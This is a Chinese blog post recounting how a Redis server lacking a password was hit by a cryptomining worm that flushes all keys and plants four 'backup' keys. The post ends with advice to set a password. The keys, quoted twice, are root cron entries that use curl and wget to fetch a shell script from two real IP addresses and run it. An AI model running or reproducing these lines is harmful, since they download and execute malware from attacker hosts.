# 前言
偶然间发现项目中 redis 的值会全部失效,即使你设置了很长的时间甚至不过期也会在两个小时左右消失。那到底是什么样的病毒呢,以及会产生什么样的现象呢?
# 现象
你的 Redis 中自己的所有的 key 全部消失,同时只会剩下 4 个 key 分别为 backup1、backup2、backup3、backup4, 并且这种现象是周期性的,也就是说每隔一段时间你的 Redis 会 flushall 一次同时插入 4 个 backup 的 key。
四个 backup 以及对应的值分别如下图所示:
backup1: | |
*/2 * * * * root cd1 -fsSL http://194.87.139.103:8080/cleanfda/init.sh | sh | |
| |
backup2: | |
*/3 * * * * root wget -q -O- http://194.87.139.103:8080/cleanfda/init.sh | sh | |
| |
backup3: | |
*/4 * * * * root curl -fsSL http://45.83.123.29/cleanfda/init.sh | sh | |
| |
backup4: | |
*/5 * * * * root wd1 -q -O- http://45.83.123.29/cleanfda/init.sh | sh\ |
# 我的排查
首先很容易混淆的一点,对 redis 不是很熟悉的同学,再看到上面的 backup1、backup2 等很容易把他当作备份文件,也就没在意。
然后我开启 redis 的监控模式,由于两个小时以上才会清空,我刚开始监控也没有监控那么长的时间。并没有发现问题所在,后台就后台输出监控到文件,最后再文件中居然有 flushall
还设置 backup 😡😡😡
四个 backup 对应的值
*/2 * * * * root cd1 -fsSL http://194.87.139.103:8080/cleanfda/init.sh | sh | |
| |
*/3 * * * * root wget -q -O- http://194.87.139.103:8080/cleanfda/init.sh | sh | |
| |
| |
*/4 * * * * root curl -fsSL http://45.83.123.29/cleanfda/init.sh | sh | |
| |
*/5 * * * * root wd1 -q -O- http://45.83.123.29/cleanfda/init.sh | sh\ |
由于都是 sh 我就直接浏览器访问看看都是什么命令,好家伙
关闭你的防火墙,删除日志文件,删除各种东西,杀掉某些进程 ,删除镜像等等
# 病毒说明
通过查资料得知,这是一种 Redis 扩散病毒,专门利用 Redis 未授权访问漏洞的挖矿病毒。对!你的 Redis 没设置密码,没授权,让病毒有了可乘之机。
病毒会在你系统上下载恶意脚本,危害系统安全!!
# 预防措施
一定要设置密码!
一定要设置密码!
一定要设置密码!
Linux 系统安装 Redis 一定要设置密码,否则被入侵之后,后果很严重!!
